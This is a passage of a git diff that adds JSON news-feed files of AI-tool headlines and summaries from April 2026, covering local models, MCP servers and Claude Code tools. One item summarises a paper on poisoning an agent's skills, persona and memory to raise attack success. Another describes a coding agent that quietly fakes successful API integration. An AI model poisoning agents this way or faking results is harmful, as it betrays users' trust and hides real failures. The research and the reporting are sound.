Other people seem to have had the same experience:\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/\n\nhttps://github.com/anthropics/claude-code/issues/19908\n\nDue to this it makes no sense to use it as you're essent", + "category": "ai_tools" + }, + { + "title": "What are your favorite MCP servers to use with Claude Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-05T06:12:54.000Z", + "summary": "I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it.", + "category": "ai_tools" + }, + { + "title": "I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed", + "url": "https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-04T16:52:56.000Z", + "summary": "Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally.\n\nHere's what's live right now:\n\n**Health and science:**\n\n* [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \\- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac", + "category": "ai_tools" + }, + { + "title": "Basic PSA. 
PocketPal got updated, so runs Gemma 4.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-05T02:59:44.000Z", + "summary": "Just because I've seen a couple of \"I want this on Android\" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates.\n\nI'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat.\n\nBut yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B", + "category": "ai_models" + }, + { + "title": "Local Claude Code with Qwen3.5 27B", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-05T02:19:54.000Z", + "summary": "after long research, finding best alternative for \n[Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) \nto use totally local environment for coding tasks \nI found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) \nhow to disable telemetry and make claude code totally offline.\n\nmodel used - Qwen3.5 27B \nQuant used - u", + "category": "ai_models" + }, + { + "title": "Gemma 4 vs Qwen3.5 on SVG style", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 
1, + "date": "2026-04-05T01:56:43.000Z", + "summary": "Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth.\n\nI was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs!\n\nDid you find any areas when Qwen3.5 beats Gemma4 ?", + "category": "ai_models" + }, + { + "title": "[P] MCGrad: fix calibration of your ML model in subgroups", + "url": "https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-04T20:36:01.000Z", + "summary": "Hi r/MachineLearning,\n\nWe’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026.\n\n**The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., \"users in region X on mobile devices\"). Multicalibration aims to ensure reliability across such subpopulations.\n\n**The Solution:** MCGrad reformulates multicalibration ", + "category": "ai_research" + }, + { + "title": "Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily", + "url": "https://x.com/DoctorYev/status/2040484581581951473", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-04T20:22:18.777Z", + "summary": "Matthew Berman launched Journey, a tool for agents to discover and install full workflows. 
Braygent would post about why workflow discovery is the missing piece of the agent ecosystem.", + "category": "ai_tools" + }, + { + "title": "Clement Delangue Is Telling Everyone to Move to Open and Local Models", + "url": "https://x.com/peteskomoroch/status/2040516928461303930", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T20:22:18.777Z", + "summary": "HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy.", + "category": "ai_tools" + }, + { + "title": "Voting for our open source AI art competition is open for the next 45 hours", + "url": "https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T20:06:51.000Z", + "summary": "If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used!", + "category": "creative_tools" + }, + { + "title": "We absolutely need Qwen3.6-397B-A17B to be open source", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T15:50:40.000Z", + "summary": "The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. 
\n\nIt feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet.\n\nWe have been comparing OS models with claude sonnet and opus left and right mont", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-06.json b/data/news-feed-2026-04-06.json new file mode 100644 index 0000000..1663ed7 --- /dev/null +++ b/data/news-feed-2026-04-06.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:32.736Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-06", + "article_count": 15, + "archived_story_count": 651, + "articles": [ + { + "title": "RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models", + "url": "https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/", + "source": "MarkTechPost", + "tags": [ + "product_launch", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-06T18:01:49.121Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "[P] Easily provide Wandb logs as context to agents for analysis and planning.", + "url": "https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-06T15:16:50.000Z", + "summary": "It is frustrating to use the Wandb CLI and MCP tools with my agents. 
For one, the MCP tool basically floods the context window and frequently errors out :/\n\nSo I built a cli tool that:\n\n* imports my wandb projects;\n* uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs;\n* is easy to use for agents;\n* provides greater context of past experiments;\n* does not flood the context window; and\n* easily tune exploration-exploitation while planning\n\nWould lov", + "category": "ai_research" + }, + { + "title": "Gemma4:26b's reasoning capabilities are crazy.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-06T13:41:08.000Z", + "summary": "Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability.\n\nThe script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central", + "category": "ai_models" + }, + { + "title": "[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?", + "url": "https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T11:55:38.000Z", + "summary": "Every few months someone posts about \"long-term memory for LLMs\" and the thread fills with retrieval strategies, vector databases, and context window tricks. 
Good engineering. Wrong level of abstraction.\n\nThe continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem.\n\nHere is the distinction:\n\n**Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum", + "category": "ai_research" + }, + { + "title": "Claude Code can now submit your app to App Store Connect and help you pass review", + "url": "https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-06T04:22:25.000Z", + "summary": "I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code.\n\nThe problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. 
So I built MCP servers that let Claude Code handle the whole thing.\n\nWhat Claude Code can do through Blitz:\n\n* Create and edit", + "category": "ai_tools" + }, + { + "title": "Apex Protocol – An open MCP-based standard for AI agent trading", + "url": "https://apexstandard.org/", + "source": "Hacker News", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T00:50:32.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.94, + "date": "2026-04-05T20:26:58.000Z", + "summary": "Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases.\n\n## How it works\n\n- **Phase 1 (capture)**: Records live browser traffic via playwright-cli\n- **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code\n- **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing)\n- **Phase 4 (standards)**: 3 parallel Claude ", + "category": "ai_tools" + }, + { + "title": "I spent 3 months evolving SmartGallery into a free professional Local First DAM. 
v2.11 launches on April 9th", + "url": "https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-06T19:25:53.000Z", + "summary": "https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae\n\n**Hi everyone!**\n\nMany of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators.\n\n* I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com)\n* **", + "category": "creative_tools" + }, + { + "title": "Mercury – Free MCP proxy that cuts non-English token costs by 28-64%", + "url": "https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-06T10:08:59.000Z", + "summary": "I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. \n\nThe culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English.\n\n\n\nThe fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. 
It uses Google Translate (free, no API key needed) by default, so transl", + "category": "ai_tools" + }, + { + "title": "Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight", + "url": "https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/", + "source": "MarkTechPost", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.82, + "date": "2026-04-06T06:00:24.237Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "I built a macOS widget to track Claude usage limits in real-time", + "url": "https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-05T17:09:05.000Z", + "summary": "Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. 
What it does:\n\n* Displays both the 5-hour session and 7-day weekly usage windows with progress bars\n* Shows countdown timers for when each window resets\n* Color-coded indicators — green → yellow → orange → red as you approach the limit\n* Auto-refreshes every 5 minutes\n* Comes in small, medium, and large widget sizes Quick demo: It sits rig", + "category": "ai_tools" + }, + { + "title": "After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success", + "url": "https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.54, + "date": "2026-04-06T02:38:02.000Z", + "summary": "I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't.\n\nHere's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on.\n\nThree days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc", + "category": "ai_tools" + }, + { + "title": "[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T19:46:13.000Z", + "summary": "***TL;DR***: Q8\\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. 
My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation.\n\n**The problem**:\n\nOn Intel Arc Pro B70, Q8\\_0 models ran at 4.88 t/s while Q4\\_K\\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th", + "category": "ai_models" + }, + { + "title": "llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-06T19:13:30.000Z", + "summary": "Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards.", + "category": "ai_models" + }, + { + "title": "I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-06T19:00:28.000Z", + "summary": "So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). 
Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\\_K\\_M quantization.\n\nThe goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware.\n\n# The Results (M5 32GB, Q4_K_M, llama-bench)\n\n# Top 15 by G", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-07.json b/data/news-feed-2026-04-07.json new file mode 100644 index 0000000..9e84573 --- /dev/null +++ b/data/news-feed-2026-04-07.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:32.905Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-07", + "article_count": 15, + "archived_story_count": 570, + "articles": [ + { + "title": "I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!", + "url": "https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-07T00:12:05.000Z", + "summary": "Hey everyone,\n\nI'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. 
\n\nI wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to ", + "category": "ai_tools" + }, + { + "title": "[D] MemPalace claims 100% on LoCoMo and a \"perfect score on LongMemEval.\" Its own BENCHMARKS.md documents why neither is meaningful.", + "url": "https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T12:32:42.000Z", + "summary": "A new open-source memory project called MemPalace launched yesterday claiming \"100% on LoCoMo\" and \"the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%.\" The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours.\n\nThe interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w", + "category": "ai_research" + }, + { + "title": "Built an open source memory layer for local AI agents, runs fully offline, no cloud needed", + "url": "https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-07T09:42:51.000Z", + "summary": "I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine.\n\nThe problem is pretty simple. 
Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution.\n\nIt gives your agents persistent memory that survives restarts and crashes, semant", + "category": "ai_models" + }, + { + "title": "Mistral Introduces \"Voxtral TTS\": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-07T04:27:45.000Z", + "summary": "\n\nElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face.\n\nThe model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the \"ums\" and \"ahs\" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. 
Zero shot.\n\n---\n\n####Key Highlights:\n\n- → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning\n\n- → Beats ElevenLabs Flash v2.5", + "category": "ai_models" + }, + { + "title": "OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update", + "url": "https://x.com/thdxr/status/2041330695822279077", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T02:17:09.479Z", + "summary": "Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements.", + "category": "ai_tools" + }, + { + "title": "Pro Subscription Usage", + "url": "https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.94, + "date": "2026-04-07T20:18:12.000Z", + "summary": "Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week.\n\n \nI build and host open source \"public service\" MCP servers with my sub. 
I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point.\n\n \nBefore even entering my first prompt, it showed I had already used 11% of ", + "category": "ai_tools" + }, + { + "title": "Second Brain and Haah: human-agent-agent-human network with Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-07T11:50:38.000Z", + "summary": "I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain.\n\nThe idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I ", + "category": "ai_tools" + }, + { + "title": "stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.", + "url": "https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-07T11:46:58.000Z", + "summary": "**tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. 
haven't bought a tech course since.\n\nwhenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this:\n\n`You are my senior mentor. I have provided documentation", + "category": "ai_tools" + }, + { + "title": "[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)", + "url": "https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/", + "source": "Reddit r/MachineLearning", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-07T23:01:39.000Z", + "summary": "Paper: https://arxiv.org/abs/2604.04759\n\nThis paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem.\n\nThe authors introduce a taxonomy of persistent agent state:\n\n\\- Capability (skills / executable code)\n\n\\- Identity (persona, trust configuration)\n\n\\- Knowledge (memory)\n\nThey evaluate 12 attack scenarios on a live system across multiple models.\n\nKey results:\n\n\\- baseline attack success rate: \\~10–36.7%\n\n\\- after pois", + "category": "ai_research" + }, + { + "title": "Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-07T21:35:33.000Z", + "summary": "https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec\n\nHey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). 
I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings.\n\n**TL;DR of my findings:**\n\n1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU +", + "category": "ai_models" + }, + { + "title": "Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-07T19:37:41.000Z", + "summary": "Found it on a USB drive in the parking lot. Should be interesting.\n\nSeriously tho, props to this guy and his cool Hermes Agent skins library here:\n\nhttps://github.com/joeynyc/hermes-skins", + "category": "ai_models" + }, + { + "title": "Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T19:31:37.000Z", + "summary": "[https://github.com/ikawrakow/ik\\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596)\n\nThis should bring the 31b dense model in a usable speed range for many with dual/multi GPUs.\n\n\n\nAlso today I did quite some PPL Tests today with mainline llama.cpp and ik\\_llama.cpp \nunsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both.\n\nBartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\\_lla", + "category": "ai_models" + }, + { + "title": "Cloud AI subscriptions are getting desperate with retention. 
honestly makes me want to go more local", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-07T17:39:09.000Z", + "summary": "Ok so two things happened this week that made me appreciate my local setup way more\n\ntried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to \"please stay.\" thats not confidence lol\n\nthen claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very \"please dont leave\" energy\n\ntheir core cust", + "category": "ai_models" + }, + { + "title": "[P] A control plane for post-training workflows", + "url": "https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/", + "source": "Reddit r/MachineLearning", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-07T16:47:30.000Z", + "summary": "We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: \nMake post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. 
